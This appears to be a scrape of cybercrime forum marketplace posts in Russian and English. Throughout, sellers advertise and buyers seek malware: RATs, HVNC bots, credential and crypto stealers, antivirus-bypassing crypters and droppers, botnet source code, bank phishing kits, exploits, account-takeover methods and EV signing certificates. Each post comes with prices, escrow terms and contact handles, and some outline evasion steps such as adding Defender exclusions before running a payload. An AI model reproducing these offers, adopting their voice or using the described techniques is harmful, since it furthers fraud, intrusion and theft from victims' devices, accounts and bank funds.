[+] All bruting modules are highly optimized to prevent rate limiting and
other counter measures, on the C2, the operator enters an IP list, Username
list and password list, and the combos are distributed among all bots
gradually.
Dropper/Persistence
[+] Windows Dropper - Strong persistence using regkeys and schtasks.
I want to sell it to 1 hand only, unless the opposite is discussed. Price is negotiable, I will hear your offer first, and garant will be used to conclude the deal. I will not work without the guarantor. Contact PM/Tox/Session.
Screenshots :
Ironet album hosted in ImgBB
ibb.co
Всем привет! рассмотрю все варианты, бюджет от 10к $ и нет предела!) все предложения в ПМ!)
Сорри если разместил объявление не в той ветке, перенесите пожалуйста
Spoiler: Закрыто на депозит
Сдаётся HVNC в аренду.
Основной функицонал:
- Веб-панель управления: стата, вьювер, управление пользователями панели
- Инфа о ботах: IP, Страна, Computer/User name, простой системы (время
последнего взаимодействия юзера с машиной), текущее активное окно
- Подержка приложений: Chrome, Edge, Brave, Firefox, CMD
- Реализован полноценный ultra-low latency video streaming протокол,
стабильная картинка до 30 фпс, минимальная задержка (зависит от многих
факторов - менее 1 сек), настраиваемый битрейт и разрешение
- Поддержка систем Win7-Win11 x86/64 - доступно несколько методов отрисовки
приложений для разных версий ОС
- Эмуляция мыши, клавиатуры (мультиязычная), вставка текста из буфера обмена
- Управление окнами запущенных приложений: свернуть/развернуть во весь
экран/изменить размер
- Запуск скрытых приложений реализован не стандартным методом, без
использования CreateDesktopW
- Стиллер: поддержка chromium/gecko-based браузеров всех версий, включая
самые старые. Собирает пароли, куки, формы автозаполнения, историю.
Расшифровка всех данных на стороне сервера. Просмотр всех собранных данных из
панели
Больше информации в ПМ.
Клиент, бэкэнд, вьювер (wasm) - написаны на Rust. Билд поставляется в виде x86
.dll, своего закрепа не имеет. Софт не работает на СНГ-машинах.
Добавление/улучшение текущего функционала по запросу. Готов предоставить софт
на тест любому из модераторов.
Цена: 3к$/мес, гарант +
Контакты: жаба в ПМ.
Пока что только 1 место.
Hey,
Im selling Unkown Vulnerable Driver. These drivers can be used to kill any process / driver. And or map your own driver using it. Ofcourse you will also be able to call any kernel function purely from this vulnerable driver .
The frameworks to use all of these drivers are all fully writen in c++
I currently have 3 Vulnerable Drivers in stock. More will be added soon. I only deal using the GUARENTEER.
Здравствуйте, Может кто поможет подскажет как обойти смартскрин без сертификата?
Куплю рабочий инструмент для работы с Bybit wallet.
Рассмотрю только проверенного продавца ,с положительными отзывами, и работа
только через Гарант !
Spoiler: Закрыто на депозит
ru:
Беру в работу вредоносные и белые файлы с последующим конвертированием в
желаемый формат [.vbs; .com; .pif; .hta; .scr]
Обход Windows Defender (облако, запуск) + браузерные скачивания.
На видео тесты с обычным putty.exe
Цена за файл 150$
eng:
I work with malicious and white files and then convert them to the desired
format [.vbs; .com; .pif; .hta; .scr]
Bypass Windows Defender (cloud, launch) + browser downloads.
Video tests with regular putty.exe
price for 1 file 150$
price: 150
contact: cryptplease
We provide BUILDER LNK 2024, a highly powerful tool for disguising your payload.
We don’t make grand claims like other sellers who only list many non-existent features.
Here are the real features of our BUILDER LNK 2024. It is exceptionally unique and simple to operate. We focus entirely on the following to ensure the best performance. We guarantee your satisfaction.
1. Bypasses most common antivirus software
2. Bypass Smartscreen
3. Bypass Chrome
4. Multiple common icons
5. Decoy (upon opening your .lnk, a file of your choosing will be displayed
on your victim's PC)
6. Display an error message when the .lnk file is opened
7. Supported payload formats: .exe/.js/.vbs/.bat/.ps1/.bin
8. Each LNK file is unique.
9. Unlimited builds
Price: $100/month
ESCROWS ARE ACCEPTED
We provide daily, hourly, monthly support. We are dedicated to resolving issues. We ensure that we stand by you. This is something no one else in this forum does well.
I need to buy the source code for an Android mouse with the following
features:
Budget 5-7k$
HVNC
Black screen
PIN/Pattern Grabber (Notification via Telegram API)
Insert PIN (Notification via Telegram API)
Updated fake black screen
Target application keylogger (Notification via Telegram API)
Requires all features to work properly.
Looking for a serious seller.
Hello everyone,
I'm selling the Trik botnet source code (also known as Phorpiex from AVs, you
can search online), along with all of its module
Everything made in C++, ready to be used. All are visual studio projects. You
only need a http server to begin working.
The bot has been known to be easy to spread very fast and make ton of money
from it. You can use the included modules to make the botnet even bigger.
Important note: This post doesn't include the p2p network scheme.
The main bot:
There is no panel, the main bot works as a persistent HTTP loader that
contains crypto-clipper for various wallet, usb spreader and pe infector. It
is very easy to maintain FUD from most AVs.
The loader checks every 30 minutes for files on the server from 1 to 5 (values
can be changed). Files are decrypted by the loader and can only be executed if
the signature is correct. The bot also checks if the module as already been
downloaded.
The pe infector works with x86 and x64 pe executables, search and infect them
with downloader shellcode using a specified url, on each drive and remot
USB spreader creates a link in the usb drive with its icon which leads to the
bot and a hidden folder containing all the user stuff.
Modules:
The pe infector can also work as an independent module. The netbios spreader
is discontinued but can still be given in the package if you want to update
it.
More modules can be coded on demand for extra money.
The price for the whole software is $6.5k. Only source code is for sale,
not the network.
Garant is recommended. Proofs can be also be provided.
Additional infos can also be given in private.
First contact by PM only.
Продам реализацию обхода эмулятора виндовс дефендера
имею 2 вариации ее исполнения, получены путем реверса
Данный метод гарантирует обход эмулятора дефендера, но не гарантирует обход детекта, если у вас например подозрительные строки в коде
Условия продажи:
- Продается ограниченно 3 лицам
- На тестирование дается ограниченное время
- Запрещается сливать в паблик/продавать данный код
РАБОТА ТОЛЬКО ЧЕРЕЗ ГАРАНТА
TOX: A04345736FCA28661BD42AF8E403F5011B434471A3D3FDD4ACD7519C35387F28777621B5621F
SELLING CPANEL CHECKER
WRITTEN IN PYTHON
PRICE: OFFERS
ESCROW ACCEPTED
TELEGRAM - @ ownerTCG
WIRE - @ TCGG
SESSION - 05e59e4ad42da1fbcf62d6d1bb852962a61adf90b8030fd48189d0ea6d1bab156d
SIGNAL - 01521 3566102
uTOX -
CDEB5E4DC30E0C4FD35AF967D66D564312CF6BFD4D055696C990880E37058F2BE508A0642889
Hey, I code custom malware that fits your needs.
Got solid experience with low-level stuff:
- C/C++
- Rust
- Assembly (x86/64)
- Algorithms
- Cryptography
What I deliver:
- Works on any Windows version
- Clean code, no bloat
- Tested before delivery
- FUD on request
Contact only through TOX (24/7) or PM.
Hit me up for details.
Многофункциональный бот с автоматическим управлением и распространением файлов.
Этот бот многофункционален, имеет возможность индивидуальной настройки и
расширения функционала за счет модульной структуры. Включает в себя функции
ботнета и CaaS, управление сетью устройств, распространение и сбор данных и
многое другое.
Продаю в связи с занятостью в другом проекте, данный бот написан с нуля и
основной описанный ниже функционал реализован, но нуждается расширении, в
некоторых местах требуется детальная проработка функций для использования в
конкретный задачах.
С проектом идет полная документация и указание на места где может потребоваться доработка. Так же полный пакет тестов которые обеспечивают тестирование каждой функции проекта.
Основной функционал:
Автоматическая рассылка, использование шаблонов сообщений. Отправка фишинговых
ссылок, маскировка ссылок под легитимные. Анализ статистики эффективности
рассылок (количество открытых сообщений, переходов по ссылкам).
Прикрепление и отправка файлов с программным обеспечением в качестве вложений
к сообщениям.
Автоматическая загрузка и установка программного обеспечения на устройства
получателей.
Централизованное управление, обновления и поддержка ботнета. Сбор любой
информации с зараженного устройства и отправка отчетов.
Обход антивирусных программ и систем безопасности.
Полиморфизм и модификация кода. Защита от удаления и анализа, включая методы
шифрования и обфускации кода.
Возможность запуска на различных операционных системах, включая Windows,
Linux, MacOS, Android, iOS. Интеграция для эксплуатации уязвимостей.
Встроенные методы обхода капчи и других механизмов защиты.
Использование алгоритмов машинного обучения. Самораспространение по сети
зараженного устройства и самокопирование на любые подключенные внешние
носители( при соединение носителя с другим устройством происходит заражение)
Цена: 2000$
Только через гаранта данного форума.
Первый контак и больше деталей ПМ.
Поддержка и консультации по установке и настройке доступны по запросу.
Looking to buy flash usdt/usdc need the transaction to be confirmed and not dissapeard instant pm me if anyone sells it
/
Продаю исходный код из-за личных проблем и финансовых трудностей, нет возможности продолжать разработку этого продукта.
Возможности: ВНЦ, ХВНЦ (проблемы с масштабированием и потоки нужно доработать), стиллер, MASS-команды.
Правила после покупки исходников: запрещено их публиковать, продавать, сдавать
в аренду, а также передавать исходники партнерам.
!Вы можете использовать софт для работы и предоставлять партнерам ссылку на
панель управления этим ботом!
Только Гарант XSS.is
.rEGG Exploit
**[ SINGLE STUB ] $50/file
[ FEATURES ]**
- UAC Bypass.
- Spoof message box.
- Bypass mail
- Bypass browser download.
- If it was not clear, WINDOWS DEFENDER ONLY.
- 0/26 avcheck
[ INFORMATION ]
A .reg exploit allows a payload to be executed on windows registry, excluded from av and keep the native payload functions ( startup, persistence, any feature ). Previous crypt is no needed, since the file is excluded. Any architecture support. Long lasting FUD.
[ CONTACT ]
Telegram: https://t.me/dllbof
Shoyo Group.
Hello dear friends! I offer my Chinese colleagues an application that disables
the 360.cn antivirus (360 Total Security)
The application is in .exe format and works in this way: first you launch
360killer (admin rights requsted), then your payload
My application stops active protection of 360.cn antivirus at the kernel level
You can contact me via Telegram — https://t.me/zerodebug
Work strictly through Escrow
Hello , we are looking for someone who has an android botnet preferably with hvnc functions , we work on withdrawing bank accounts to crypto, if anyone is willing to rent the panel or work with us for % we would love you to let us know, I only have 90$ but maybe someone is interested as an initial payment, after making the withdrawals you will be paid the deserved %, or if someone knows somewhere to download android banking botnet I would also be grateful, greetings to all
Добрый день
Ищу человека в команду кто будет осуществлять разработку, тестирование и подержку инжектов для команды с приватным софтом. (ПК)
Опыт работы обязателен, портфолио будет преимушество для вас при отборе.
Форма оплаты сдельная, пишите в пм.
Хороших выходных.
Spoiler: closed for deposit
Android RCE Exploit
Exploit Type: ZeroClick
#Attack type - 0click
#Payload - MMS
#Control over Device
Support Android Version 11,12,13,14
Support All phones
Contact us for POC
Since the public bots are outdated now i recoded the cypher aka spymax fork(almost had no features except connection and vnc) and we are looking people who can work with us in 1st world countries. We can handle the Rat - Dropper - Fud also Google and Meta ads if you cant do that all you gotta do is cashout our transfers from victims and inform us about how to get victims on these countries with ads.
Ive recoded the cypher based on latest PlayProtect requirements at my free time so if we satisfy with your work you will have access to our private botnet in future that 10 times better than that.
Just message your telegram address if you are interested i wont reply other dms.
Demo Video
![streamable.com](/proxy.php?image=https%3A%2F%2Fcdn-cf- east.streamable.com%2Fimage%2Fzvi4n5.jpg%3FExpires%3D1724948545735%26Key-Pair- Id%3DAPKAIEYUVEN4EVB2OKEQ%26Signature%3DD0cUJDJ0Ad1L%7EiHJcHlPMuyMbRg4shUyrFgAkA1EHybxqdFoHRFKbPmPjRdHD1xcCSN9w7Rl744wFm8NLIzHxYRx1Fc7W821buFYvl0RPv2Qe83nMsucjX5gfG2CgP9LN%7EZyNFrdVAwQsau%7Eyq3OoHbUQR4S4mun6obxa5lfER8eRgz- rdXSgEvTBNH1w4qu7rAyPOFNWzOoj3v8PpWhN6ytFFxUgNt8UaTAB8ynMpHe9ABtQw2G9e8tl35yjv2Hu9LHBErk%7ENWeIyBQ7rNn1SIABs4GevefNJ32WkPdaCORf-G03FLlJxTH8s7qaZwEyViif6zSExOQaLMQHij6RA__&hash=8efd1a9a97afe52540a8e4ea122554ae&return_error=1)
Watch "2024-08-26 19-01-52" on Streamable.
streamable.com
Android Bot - looking for traffic
Offering android bot for traffic pour, not for sale or rent
Features of the Bot
1.On first install upload all Contacts,Sms,Notification,Installed Apps to
webpanel
2.New sms will be uploaded to webpanel as well as send to telegram bot
3.Unique, instead of uploading all new sms to webpanel, filter based on
number/name
4.Can send a request from webpanel to fetch new sms when you are expecting sms
5.Send sms to specific number or bluk sms
6.Send notification with a phishing link
7.Custom Webview
8. Works on Android untill 15
Developed from scratch
Future update
1.Injections for bank/crypto/cc
2.Hide/unhide icon
3.Hide when trying to delete
4.Black screen
5.Update notification
6.Auto grant permissions - need to test on all devices
7.VNC - not sure about this for now
Technology - Kotlin/Nextjs
Only looking for traffic, i will provide apk,fud and panel access, if you need
any more requirements will add it if they are necessary for the project
Contact via pm, Tox 80ADC4F5EECF1EBA7F69727AC1A876E53C81ADB4BB98F36549393504819F9E373CD556BFDE44
Screenshot
отпишите или скиньте кто может криптануть АПК файл! бот ОКТО
Всем примет в наличиие 0 day от сайта кошелька bitcoinira.com
Имея только email, вы сможете легко и незаметно восстоновить пароль и зайти в
учетную запись
Для работы нужна только анти капча
Стартовая цена 50.000$
Первый контакт ЛС. Сделка только через гарант XXS
Неактуально
EV Code Signing Certificates - Professional Global Service
Contact:
t.me/Ailurophilevn
Note:
Beware of fake accounts impersonating me. Verify carefully before proceeding
with any transactions.
Escrow:
Accepted (Escrow fees covered by you).
**EV Code Signing Certificates Sales Service
Types of EV Certificates Offered:**
Global Sign: $3000 / Random name / 10-14 days delivery.
($2500 for orders of 5 EVs or more).
Digicert: $3500 / Random name / 10-14 days delivery.
($3000 for orders of 5 EVs or more).
Important Information Before Ordering:
Transaction Policies:
Once an order is placed and payment is made, we will begin the registration process for the EV Code Signing certificate.
We provide expedited worldwide shipping of the USB token to your specified address. Once you receive the token, we will guide you through activation and usage. Tracking information will be provided after shipment.
We offer a secure storage service for your token and can sign files upon request.
We guarantee not to share or misuse your token without your consent.
No refunds will be issued once the order is placed.
No refunds will be provided if the EV is revoked due to malware-related abuse reports.
Feel free to contact us for further details or inquiries!
Нужен пш кодер для проекта на вечерок буквально, нужно сделать быстро и
оперативно, задача легкая.
Цена и контакты в ПМ
ScanTime.pro -**Сканнер ваших файлов на кластере из антивирусов
Автоскан - мощный инструмент для мониторинга детектов в реальном времени с последующем уведомлением в телеграмм**
Мы не сотрудничаем с антивирусными компаниями, ваши файлы в безопасности
URL:www.scantime.pro
Support: t.me/scantime_pro
Как следует из названия темы, закажу разработку Android RAT с требуемым функционалом, а именно:
Серверная часть должна содержать интуитивно понятный GUI-интерфейс. Требуется работа на всех существующих версиях андроид, поэтому нужна последняя версия SDK. Если потребуются Assembly для работы, то они после установки должны запрашиваться в интуитивно понятном для пользователя формате (опять же, отлично с этим справляется Craxs, там показывает куда нужно тыкнуть и что включить).
Работа ТОЛЬКО через гаранта xss и без разбива на части. Одна сделка на весь продукт. Цену обсудим индивидуально, но это должно быть что-то в пределах разумного. Аренда не интересует, работа под процент тоже.
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FTvcXGyG%2Flogo- removebg.png&hash=85785abf6ac5d6b1f3ad7c8cab4e4e70)
[EN]
Greetings.
We have developed a promotional product for forum users. This phishing kit
contains 5 phishing pages source code (html, css, js).
Once you buy the package you will get this pages in a zip file and use as much
as you want. The pages are connected to a TG bot so you can control what
victim sees on screen at real time. Please watch the video below to understand
how this kit works. We can add any phishing pages in the list below for extra
20 USD when you buy the product. We prefer payment in Monero(XMR) but you can
pay with any cryptocurrency with an extra 10 USD conversion fee.
[RU]
Приветствие.
Мы разработали промо-продукт для пользователей форума. Этот набор для фишинга
содержит исходный код 5 фишинговых страниц (html, css, js).
Как только вы купите пакет, вы получите эти страницы в zip-файле и можете
использовать их сколько угодно. Страницы подключены к TG-боту, поэтому вы
можете контролировать, что жертва видит на экране в режиме реального времени.
Пожалуйста, посмотрите видео ниже, чтобы понять, как работает этот набор. Мы
можем добавить любые фишинговые страницы из списка ниже за дополнительные 20
USD при покупке продукта. Мы предпочитаем оплату в Monero(XMR), но вы можете
оплатить любой криптовалютой с дополнительной комиссией за конвертацию в
размере 10 USD.
Spoiler: Phishing Pages / Фишинговые страницы
Australia
ANZ
Commonwealth Bank
National Australia Bank
Westpac
Brazil
Banco Bradesco
Banco do Brasil
Banco Itaú
Nubank PJ
Canada
CIBC
Desjardins
PayPal CA
RBC Royal Bank
Scotiabank
TD Canada
Germany
Deutsche Kreditbank
ING Deutschland
PayPal DE
Postbank
Sparkasse
Volksbanken Raiffeisenbanken
Spain
Banco Sabadell
BBVA
CaixaBank
N26
PayPal ES
Santander
France
Caisse d'Épargne
Crédit Mutuel
L'Appli SG
La Banque Postale
Ma Banque
Italy
Banca Intesa Sanpaolo
BNL
Fineco
ING
MPS Bank
UniCredit
Mexico
Banco Azteca
Citibanamex
Mercado Pago
Santander MX
Turkey
Garanti
Halkbank
VakıfBank
Ziraat Bankası
İş Bankası
United Kingdom
Barclays Bank
Halifax
HSBC UK
Lloyds Bank
PayPal UK
United States
Bank of America
Capital One
Cash App
Chase Bank
Chime
PayPal US
Venmo
Wells Fargo
Crypto Exchanges
Binance
Bybit
Coinbase
Crypto.com
OKX
Credit Card Grabbers
Credit Card_de
Credit Card_en
Credit Card_es
Credit Card_fr
Credit Card_it
Credit Card_pt
Credit Card_tr
Social Media
Facebook_en
Facebook_es
Google
Instagram_en
Instagram_es
TikTok_en
TikTok_es
Demo:
Mobile screenshots:
Zip Content:
We need to buy or rent an android botnet to inject crypto/bank/cc with vnc,
hvnc functions, if anyone sells please message me
Or if anyone knows the seller or rental, introduce the seller and we will send
you $100. Be ready to transfer money to the guarantor. Thank !
от 3$к+
Посоветуйте у которого такие функции работают стабильно или куплю.
Подойдёт не чистый
нужна стабильная работа этих 3х функций port forward,socks5 , cmd
**Many of us have login credentials (email and password) for multiple Facebook accounts, but when trying to log in, we are often surprised by Facebook requesting approval for the login from a trusted device. This happens because the login attempt is from a new or unfamiliar device.
No worries—I'm selling a bypass method that allows you to skip this verification and successfully access the account.
I am offering the full details of the bypass method for $500, without using it myself. Once purchased, you'll receive a comprehensive guide on how to utilize it, enabling you to target any accounts of your choice.
Alternatively, if you'd prefer to target just one account, I can handle it for you at a rate of $100 per account.
All transactions are securely processed through Escrow for your protection.
If you're interested PM me.
I understand that my account is new, which may raise concerns about fraud. However, all transactions are handled via Escrow, ensuring a completely secure process.**
If you don 't even know how to compile the project, this topic is not for
you. I'm not gonna teach you about this.
u must use escrow!
Google Bypass
:
Avast 2023 not tested the never versions Runtime&Scantime:
Discord Bypass
:
Windows Defender Runtime&Scantime 10 Pro 22h2 :
total size: 68mb
**I am selling my entire project for a good offer. "obfs methods, runpe, stub, sources code. (scantime and runtime)"
for the videos, questions; **
**qtox:**67F7CEBA9FC2E83B572DC1240362DDC511B50BF4FD182749B81AAFFC0744B4724CB5DCCD62A2
telegram: @realgasx
**
**
Spoiler: Closed on deposit: $9000
Introducing Cellik RAT: The Next Evolution in Android Remote Access Tools
Unlock Unmatched Control with the All-New Cellik RAT – a powerful tool designed for advanced remote access and ultimate device management. Building on the renowned features of CraxsRAT, Cellik RAT delivers major updates, optimized performance, and an arsenal of expanded capabilities to redefine what’s possible in remote administration. From seamless device monitoring to enhanced crypto wallet targeting, Cellik RAT offers everything you need for sophisticated and stealthy control over Android devices.
Key Features of Cellik RAT
1. Advanced Location Tracking & Geofencing
Precisely monitor and set geographic parameters to automate commands based on
device movement.
2. Contact and Communication Surveillance
Gain unrestricted access to contacts, SMS, and call logs, including reading,
sending, and deleting messages.
3. Enhanced File System Access & Data Control
Full management of device storage, including viewing, moving, deleting, and
securing files even in cloud directories.
4. Media Capture & Real-Time Monitoring
Stream the device screen live, activate cameras, and record audio for real-
time surveillance.
5. Sophisticated Keylogging & Clipboard Access
Capture keystrokes and clipboard contents, perfect for tracking sensitive
information.
6. Custom Push Notifications & Social Engineering
Send personalized push notifications to deceive and guide users, enabling
seamless social engineering.
7. Revolutionary Persistence & Anti-Detection
Bypass Google Play Protect with advanced obfuscation and anti-removal
measures, ensuring undetected, persistent access.
8. Encrypted Data Exfiltration
Securely extract data to remote servers using cutting-edge encryption, keeping
your operations secure.
9. Full Network & Device Management
Control Wi-Fi settings, adjust device configuration, and execute custom
commands as needed.
10. Complete System Access & App Management
Adjust device settings, install/remove applications, and monitor resource
usage to optimize performance.
11. Automated AI-Driven Behavioral Analysis
Utilize AI to analyze user behavior and automate tasks based on their activity
patterns, maximizing stealth.
12. Exploit Root & System Vulnerabilities
Elevate privileges and inject into system processes for even deeper access and
control.
13. Crypto Wallet Targeting & Extraction
Detect and target popular crypto wallets.
Intercept transactions, replace addresses, and exfiltrate private keys or seed phrases.
Real-time, multi-currency support for seamless crypto asset management.
14. Enhanced UI for Seamless Command Execution
The new intuitive dashboard allows for easy command execution and management
across multiple devices.
ESCROW IS ACCEPTED
1 Month: $100 Lifetime: $900
@MalwareGPT_Support @CellikSericeBot
Продам RedLine ЛТ до 2030 года LOG PASS + последнюю версию панели. Цена
обусловлена отсутствием других персонажей на вашей панели, передаю Вам и никто
больше пользоваться кроме вас не будет. Лежит без дела
Цена 150$
Официальная цена 600$
в поисках брута. рассмотрю покупку
пишите в лс, гарант +
Приветствую! Нужен лодер (exe). Основная задача - при запуске скачать (https) dll и зарегистрировать, следом за этим запуск батника. Так же необходима поддержка этого софта в чистоте относительной. Конечно хотелось бы максимально эффективный инструмент, чтоб без лишних движений и опреаций на диске и тд. Бюджет ОТ 1K$. Вопросы в лс.
Hola estoy buscando la rata brasileña Kl remota, ¿alguien puede compartir?
Spoiler: Закрыто на депозит. Внесите депозит 500 $
**• BROWSERS
• Google Chrome
• Google Chrome Beta
• Google Chrome SxS
• Google Chrome Dev
• Google Chrome Unstable
• Google Chrome Canary
• Chromium
• Microsoft Edge
• Brave Browser
• Epic Privacy Browser
• Amigo
• Vivaldi
• Kometa
• Orbitum
• Mail.Ru Atom
• Comodo Dragon
• Torch
• Comodo
• 360ChromeX
• Slimjet
• 360Browser
• 360Browser SE6
• 360Browser SE
• 360 Secure Browser
• Maxthon3
• Maxthon5
• Maxthon
• QQBrowser
• K-Meleon
• Xpom
• Lenovo Browser
• Xvast
• Go!
• Safer Secure Browser
• Sputnik
• Nichrome
• CocCoc Browser
• Uran
• Chromodo
• Yandex Browser
• Yandex Browser Canary
• Yandex Browser Dev
• Yandex Browser Beta
• Yandex Browser Tech
• Yandex Browser SxS
• 7Star
• Chedot
• CentBrowser
• Iridium
• Opera Stable
• Opera Neon
• Opera Crypto Developer
• Opera GX
• Elements Browser
• Citrio
• Sleipnir5 ChromiumViewer
• QIP Surf
• Liebao
• Coowon
• ChromePlus
• Rafotech Mustang
• Suhba
• TorBro
• RockMelt
• Bromium
• Twinkstar
• iTop Private Browser
• CCleaner Browser
• AcWebBrowser
• CoolNovo
• Baidu Spark
• SRWare Iron
• Titan Browser
• AVAST Browser
• AVG Browser
• UCBrowser
• URBrowser
• Blisk
• Flock
• CryptoTab Browser
• Sidekick
• SwingBrowser
• Superbird
• SalamWeb
• GhostBrowser
• NetboxBrowser
• GarenaPlus
• Kinza
• InsomniacBrowser
• ViaSat Browser
• Naver Whale
• Falkon
• Sogou
• Firefox
• SeaMonkey
• Waterfox
• Waterfox Classic
• Thunderbird
• IceDragon
• Cyberfox
• BlackHawk
• Pale Moon
• Basilisk
• BitTube
• SlimBrowser
• OPTIONS
• DNS support (you can use duckdns or others)
• Foxmail, Thunderbird, Outlook 365 grab
• Winscp, FTP grab
• Gecko(Firefox) Cookies, Passwords
• Crypto Clipper(BTC, ETH, XMR, XLM, XRP, LTC, NEC, BCH, DASH)
• Steal Windows Product Key
———————• Already existing ones •———————
• All Cookies, Passwords, Auto Fills Stealing
• Many Wallet Stealing
• Telegram Data
• Discord Token
• CONTACT ME
- **https://t.me/styxencode
I'm looking for an Android mouse (private) or programmer with the following
features:
Pin code
Hvnc (works fine)
Updated fake black screen
Target App Keylogger (update application injection on demand)
Write to discuss prices.
Check out the video
Ищу человека в команду для обхода EDR
от 1-10к
За контатктами в ПМ
del
Selling and creating Facebook Phishing Pages.
Can create more new sites for phishing what you need!
All sites have three steps - form, password, 2FA code. Sending logs to TG/Gmail through emailjs. Anti "google safe browser" red-table system on all of the designs.
have more another designs.
for see online examples - contact me in TG.
Spoiler: First design
Spoiler: Second design
Spoiler: Third design
Spoiler: !NEW! Design
Приобрету av killer, с работой по windows server 2008 r2 - 2022 с популярными AV\EDR. С постоянной подпиской/поддержкой
Private .BAT Crypter, Bypass Windows Defender, UAC Bypass
scrubcrypt.su
[align=center]Providing FUD Crypts since 2022[/align]
6/24/24
SC V4 Update -
[+] Stub Updated.
[+] Scantime Detections Fixed.
[+] Rootkit Enabled back.
[+] Runtime detections Fixed.
[+] Startup Issue Fixed.
[+] Hidden Console Fixed.
6/13/24
SC V3 Update -
[+] .Exe invalid building fixed.
[+] Stub Updated.
5/27/24
V4 Update
[+] Stub Updated.
[+] Startup Issue Fixed.
[+] .EXE support Added.
V3 Update
[+] Stub Updated.
[+] UAC Bypass Updated.
5/16/24
- New BAT obfuscation
- Random build size to avoid basic signature-based detections
- Native support for Origin Logger and various other payloads
- Fixed ScanTime detection
- Removed detections from BitDefender, 360.cn, and Kaspersky
- Updated UAC bypass mechanism
- Fixed detection issues related to the latest Windows Defender security
update
- RootKit Added
Runtime Scan - https://scanner.to/result/isS7TzhPCFGq
Scantime Scan - https://avcheck.net/id/nxtoUdRFoEkf
5/15/24
[+]Stub Updated
4/27/24
[+] Startup Method Updated
[+] Stub Updated.
4/21/24
[+] UAC Bypass Sig Fixed.
[+] (Signed) .Exe Support Added.
[+] Startup Duplication Fixed.
4/17/24
[+] UAC Bypass fully fixed
[+] Sophos itself removed
[+] Stub Updated
[+] Added auto-update
[+] Website updated to https://scrubcrypt.su
Runtime:
scanner.to
Bypass Defender Video Proof:
[video=vimeo]https://vimeo.com/936046795[/video]
3/21 (Bypass Defender)
4/7/24 - Re-FUD
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
scanner.to
3/27/24
Update - SC 2.2 has been released,
[+] Fixed some bugs
[+] Removed transparency
[+] Added auto-login, just create a license.json add your license there and
press login.
[+] Stub Updated
[+] New Protection/Obfuscation added
[+] UAC Bypass Sig Fixed.
[+] WD 11 + F-Secure + Avast(only .NET) Sig Fixed.
[+] Removed Broken Auto-Update
[+] Added a small rootkit in startup + UAC so your victims can't see the file.
[+] Xeno-RAT is now supported.
[align=center][
3/1/24 - Update pushed, stub updated everything is FUD and bypass defender 3/1/2024
https://avcheck.net/id/3NPYHHQep6iJ
https://scanner.to/result/5uJBMGdNsyyg
2/20/24 - Stub updated/refud, auto update added, AMSI bypass updated,
website update with new file.
1/22/24 - Software updated to 2.1 Website updated, keys refilled, payment
methods updated (Fixed litecoin, added USDT and BNB), stub re-FUD!
Runtime Scan 2/1/24
https://scanner.to/result/33XUh7hyYLYF
Buy Now - https://scrubcrypt.su - Instant Product Delivery
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2Fq19FKRx%2FScrub-
Crypt-v2.png&hash=8c9e24eecbfe0d240851202900786cfe)](https://scrubcrypt.su)
[contract=tid]Start Contract[/contract][/align]
Продам дропер / лаунчер / лодер с исходниками сервера, можно поставить на ленд
или куда хотите. В криптовании не нуждается.
Работает добавляя исключение диск C:// , офает рантайм проверку дефа, и после
подгружает малварик в темп папку запуская его.. Под подпись ev сертификатом
подходит.
На сервере проверка айпишников и автодобавление ботов в список. Отстук в
телеграмм о запуске, подсчёт запусков, сбор инфы кол-во оперативки, имя юзера,
производитель видеокарты, айди билда. имя процессора, версия винды.
Сервер на php, есть возможность замены доменов и делания зеркал с помощью
pastebin.
I’m selling a dropper/launcher/loder with server sources, you can put it on
the landing page or wherever you want. Does not require encryption.
It works by adding an exception to the C:// drive, performs a runtime check of
the def, and then loads the malware into the temp folder, launching it..
Suitable for signing with an ev certificate.
On the server, IP addresses are checked and bots are automatically added to
the list. Notification in telegrams about launch, counting of launches,
collection of information, amount of RAM, user name, video card manufacturer,
build ID. processor name, Windows version. Mirror feature if domain being
blocked, u can do other without change anything.
Server bases in php, only one file.
Virustotal 0
Demo:
Formats: MSI, Setup, Zip.
Exclusion C://, disbaling defender runtime monitoring, download malware and
run it. Https calls with ssl supported.
Установка за дополнительную плату.
Long-term purchase of 0day/1day RCE vulnerability exploits.
The budget is very sufficient, as long as you want to sell, please contact me.
Whether it is a software application/or system vulnerability, I can give you
the price you want.
You can contact me privately on the site, or TOX.
TOX:09929B488C042024AC00990E78CAA36460F104E7BCD9155564A4C307BDF0B44B6FFCB53A691E
Я принял серьезное решение, о котором давно задумывался.
Я закрываю проект, приносящий мне 30.000$+/ежемесячно. Все это в основном упирается в вопрос моей безопасности, а сейчас я получил вести, которые подтолкнули меня к этому решению. Мое решение полностью окончательное, я ухожу раз и навсегда, буду развиваться по-белому. Надеюсь, что не вернусь никогда.
Если же у вас есть желание купить сурс, то вот цена:
Панель(самопис автооплата bitcoin, админ-панель, ReactJS, Golang) + варианты
стиллера + C/C++ морфер MorphMePlease за 10k$ + вся инфраструктура уже
поставленная = 100k$
At sell for only $50 a Windows rat with all this features, the victim exe it's created with C++, the server with C# and the web client with Angular
Windows RAT with the following features:
Plus some more file related features:
Есть свой приватный инструмент под Андроид с внц (работа до 14 версии включительно) который активно развивается. Возможность делать ботов уже есть.
Из-за того что не хватает своих рук ищем людей с готовыми (рабочими) схемами у которых нет инструмента или не устраивает текущий по следующим направлениям:
Так же приветствуются схемы по точечным установкам, с прицелом, в идеале, на крипту.
работа по СНГ и US не рассматривается
первая связь ПМ
Доброго дня.
Продаю Botnet, предназначенный для брутфорса RDP Доступов вместе с исходниками
или выдаю билд привязанный к IP вместе с файлом сервера.
Язык клиента и сервера - C++
Клиент и сервер не имеют зависимостей - статичная линковка.
Сервер представляет из себя простую консоль с выводом о текущем подключении клиента, в заголовке общее кол-во машин в данный момент имеющих подключение, а также кол-во положительных результатов пришедших с клиентов и сохраненных в файл.
Описание работы клиентской части:
Цена договорная, обсуждается в ЛС форума или ТГ.
Сделка через гаранта форума.
Также при выявление багов или пожеланий доработки будут сделаны соответствующие правки.
При покупке исходников доведу человека до стадии успешной компиляции и
работоспособности.
При покупке скомпилированной серверной и клиентской частей - помощь с
установкой и проверка работы.
i want to buy redline stealer lifetime and real/original version must be
escrow
My tg
hllo I need someone who can develope cash fake bank transfer app
Предоставляю услуги по чистке , модификации и крипту популярных
post exploitation фреймворков
Имею возможность делать уникальные сборки, которые будут работать в контексте
